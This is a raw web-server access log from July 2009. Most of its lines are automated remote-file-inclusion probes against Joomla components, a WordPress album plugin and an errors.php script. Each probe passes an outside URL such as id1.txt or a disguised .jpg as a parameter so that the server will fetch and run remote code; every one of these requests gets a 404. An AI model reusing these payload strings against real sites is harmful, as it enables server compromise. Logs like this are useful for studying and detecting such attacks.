64.191.102.117 - - [12/Jul/2009:00:31:51 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:32:09 -0400] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:32:09 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:32:11 -0400] "GET /logs/access_log.Q109052700//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:32:19 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.232.54.48 - - [12/Jul/2009:00:32:46 -0400] "GET /logs/error_log.Q109052400%20/errors.php?error=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
201.232.54.48 - - [12/Jul/2009:00:32:46 -0400] "GET /logs/errors.php?error=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg?%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
201.232.54.48 - - [12/Jul/2009:00:32:46 -0400] "GET /errors.php?error=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg?%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
64.191.102.117 - - [12/Jul/2009:00:33:04 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:33:04 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:33:09 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:33:10 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:33:26 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:33:26 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:33:26 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:33:29 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.232.54.48 - - [12/Jul/2009:00:33:57 -0400] "GET /errors.php?error=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg?%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
201.232.54.48 - - [12/Jul/2009:00:33:57 -0400] "GET /logs/access_log.Q109062100/errors.php?error=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
201.232.54.48 - - [12/Jul/2009:00:33:57 -0400] "GET /logs/errors.php?error=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg?%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
64.191.102.117 - - [12/Jul/2009:00:33:59 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:34:00 -0400] "GET /logs/access_log.Q109051700//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.232.54.48 - - [12/Jul/2009:00:34:07 -0400] "GET /logs/access_log.Q109052100/errors.php?error=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
64.191.102.117 - - [12/Jul/2009:00:34:10 -0400] "GET /logs/access_log.Q109051700//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Jul/2009:00:34:14 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Jul/2009:00:34:14 -0400] "GET /logs/access_log.Q109053100%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:34:30 -0400] "GET /logs/access_log.Q109051700//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:34:51 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:34:51 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:34:51 -0400] "GET /logs/access_log.Q109051800%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.232.54.48 - - [12/Jul/2009:00:34:51 -0400] "GET /logs/access_log.Q109052100/errors.php?error=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
201.232.54.48 - - [12/Jul/2009:00:34:51 -0400] "GET /logs/access_log.Q109062100/errors.php?error=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
217.147.30.80 - - [12/Jul/2009:00:34:53 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Jul/2009:00:35:05 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.249.68.70 - - [12/Jul/2009:00:35:08 -0400] "GET /images/items/index5_bngraf.jpg HTTP/1.1" 200 3051 "-" "Googlebot-Image/1.0"
190.144.44.36 - - [12/Jul/2009:00:35:10 -0400] "GET /logs/access_log.Q109053100%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:35:12 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:35:12 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:35:15 -0400] "GET /logs/access_log.Q109060800%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:00:35:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.223.3.98 - - [12/Jul/2009:00:36:03 -0400] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:36:03 -0400] "GET /logs/access_log.Q109070200//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:36:03 -0400] "GET //wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:36:03 -0400] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:36:03 -0400] "GET //wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:36:03 -0400] "GET /logs/access_log.Q109070200//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:36:57 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:36:57 -0400] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:36:57 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:37:00 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:37:05 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:37:05 -0400] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:37:05 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:37:11 -0400] "GET /logs/access_log.Q109052700%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:37:13 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:37:17 -0400] "GET /logs/access_log.Q109051800%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:37:18 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:37:30 -0400] "GET /logs/access_log.Q109060800%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:37:35 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:37:36 -0400] "GET //wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:37:36 -0400] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:37:37 -0400] "GET /logs/access_log.Q109070200//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:37:38 -0400] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:37:38 -0400] "GET /logs/access_log.Q109070200//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:37:38 -0400] "GET //wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:37:45 -0400] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:37:45 -0400] "GET //wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:37:45 -0400] "GET /logs/access_log.Q109070200%20%20//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:37:47 -0400] "GET //wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:37:47 -0400] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:37:47 -0400] "GET /logs/access_log.Q109070200%20%20//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:38:00 -0400] "GET /logs/access_log.Q109070300//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:38:00 -0400] "GET /logs/access_log.Q109070300//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:38:10 -0400] "GET /logs/access_log.Q109070300%20%20//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:38:10 -0400] "GET /logs/access_log.Q109070300//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:38:11 -0400] "GET /logs/access_log.Q109070300//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:38:11 -0400] "GET /logs/access_log.Q109070300%20%20//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:00:38:38 -0400] "GET //wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:00:38:42 -0400] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:00:38:43 -0400] "GET /logs/access_log.Q109070200%20%20//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:00:39:26 -0400] "GET //wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:00:39:26 -0400] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:00:39:26 -0400] "GET /logs/access_log.Q109070200%20%20//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:39:39 -0400] "GET //wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:39:39 -0400] "GET /logs/access_log.Q109070200//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:39:39 -0400] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:39:41 -0400] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:39:41 -0400] "GET //wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:39:41 -0400] "GET /logs/access_log.Q109070200//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:40:00 -0400] "GET /logs/access_log.Q109070300//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:00:40:04 -0400] "GET /logs/access_log.Q109070300//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:40:04 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:40:05 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:40:05 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:40:08 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:40:08 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:40:08 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:40:17 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:40:17 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:40:20 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.115.111.251 - - [12/Jul/2009:00:40:23 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
217.147.30.80 - - [12/Jul/2009:00:40:41 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:40:41 -0400] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:40:41 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:40:48 -0400] "GET /logs/access_log.Q109051700//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:41:16 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:41:17 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:41:17 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:41:17 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:41:19 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:41:23 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Jul/2009:00:41:24 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:41:29 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:42:03 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jul/2009:00:42:04 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
